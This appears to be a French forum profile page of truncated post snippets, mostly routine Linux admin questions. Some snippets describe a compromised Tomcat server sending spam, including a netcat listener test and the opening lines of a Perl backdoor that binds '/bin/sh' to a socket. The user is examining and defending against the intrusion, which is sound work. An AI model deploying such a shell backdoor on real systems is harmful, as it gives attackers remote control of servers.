Recherche:

Haaaaaaaaaaa mais non ! Ce n'était pas ce que je cherchais :o) ! Surtout que je t'ai remercié plusieurs fois, en précisant que tu m'aidais beaucoup. Je trouverais cela gratifiant à ta place :D
...

Ha là, tu viens de me faire comprendre un point supplémentaire. Dans ma vision du scénario, c'était bien le C&C qui infectait les différents serveurs et exploitait ensuite la backdoor.

Pour être...

J'ai exécuté le script en local (127.0.0.1) et le port utilisé (2121) n'est pas ouvert pour l'extérieur via iptables... J'avais lu le script et j'avais bien compris ce qu'il faisait, hormis le...

nc -vv -l 2121



Connection from 127.0.0.1 port 2121 [tcp/scientia-ssdb] accepted
--==Systeminfo==--
Linux host.domain.lan 2.6.32-504.23.4.el6.x86_64 #1 SMP Fri May 29 10:16:43 EDT 2015 x86_64...

C'est bien ce que je crains également...

J'ai trouvé le script perl:


#!/usr/bin/perl
use IO::Socket;
$system = '/bin/sh';
$ARGC=@ARGV;
if ($ARGC!=2) {

lol, c'est pas faux :)

Je pense que le cric, c'était la règle iptables que j'ai ajouté qui bloque l'IP Coréenne en entrée/sortie, ce qui a permis de bloquer le spam sur le premier serveur....

Bonjour à tous,

J'ai configuré un serveur SMTP Postfix afin d'envoyer quelques mails depuis d'autres serveurs.

J'ai autorisé uniquement les subnets qui m'intéressaient via la directive...

Bha si, c'est pour ça que j'en parle. Après, comme j'ai dit dans le post suivant, c'est un simple mailerPHP qui est utilisé pour délivrer le spam et activé via une commande IRC... En tout cas, c'est...

Les scripts sont assez simples et disponibles sous Github, cela semble de "simples" PHP mailers. De ce que je comprends, ce sont les scripts utilisés APRES la prise en main de mon système afin...

Sur un autre de mes serveurs, j'ai eu exactement le même problème.

Processus semblable connecté vers la même ip sur le port 25. J'ai eu le réflexe de faire un tcpdump avant de le killer, il...

J'ai un Apache en mode reverse proxy vers un JBoss. Aucune interface de gestion n'est activée, nous utilisons uniquement la ligne de commande.



Celle de la voisine, je n'espère pas ^^. Par...

J'avais déjà lancé quelques find mais je n'ai rien trouvé de bizarre.

Par contre, la question que je me pose, c'est comment cette commande peut être lancée alors que j'ai bloqué l'IP en...

Bonjour à tous,

Un processus suspect tourne sur un de mes serveurs web, ci-dessous la sortie de la commande ps:


tomcat 7538 0.0 0.0 128428 3692 ? S Nov27 0:06...

Bonjour à tous,

Je vais bientôt travailler pour une société ayant déployé une application web Java dans une infrastructure virtualisée sous VSphere 5.5.

J'aimerais connaitre les différentes...

Bonjour à tous,

J'ai plusieurs serveurs dédiés chez un fournisseur. Ceux-ci ne peuvent contacter que la passerelle. C'est à dire que même si je veux lancer un ping entre mes serveurs, cela doit...

Merci à vous deux et particulièrement à Flodelarab pour son explication plus que complète !!!

Hello,

Je recherche dans une série de fichiers cette occurrence: "slyzor\@bla.fr";

Voici les commandes que je lance sans succès:

grep "slyzor\@bla.fr" *
grep ""slyzor\@bla.fr"" *
grep...

Le problème a été réglé en supprimant le fichier /usr/local/share/perl5/CPAN/Meta.pm.

Le problème a été réglé en supprimant le fichier /usr/local/share/perl5/CPAN/Meta.pm.

Bonjour à tous,

Il m'est impossible d'installer des modules supplémentaires sur un de mes serveurs RedHat, voici l'erreur rencontrée:

[root@xxx jmx4perl-1.10]#cpan Config::General
CPAN:...

Bonjour à tous,

Il m'est impossible d'installer des modules supplémentaires sur un de mes serveurs RedHat, voici l'erreur rencontrée:

[root@xxx jmx4perl-1.10]#cpan Config::General
CPAN:...

LOL

Le pire, c'est que d'habitude, je le fais avec lorsque cela ne donne pas le résultat attendu...

'fin, merci du rappel N_BaH !

Merci chrtophe mais je me suis sans doute mal exprimé.

Je suis dans le répertoire "directory" qui contient ceci:

x / x1 / x2
y / y1 / y2
z / z1 / z2 / httpd_users
httpd/ xx / xxx

Si je...

Hello *,

J'ai un répertoire contenant cette arborescence:

x / x1 / x2
y / y1 / y2
z / z1 / z2 / httpd_users
httpd/ xx / xxx

Si je me place dans le dossier et que je lance find -name...

Hello *,

Quelqu'un a-t-il déjà configuré deux daemons OpenVPN sur le même serveur ?

J'ai un serveur avec deux IP publiques de pays différents. J'aimerais avoir un serveur VPN sur chacune de...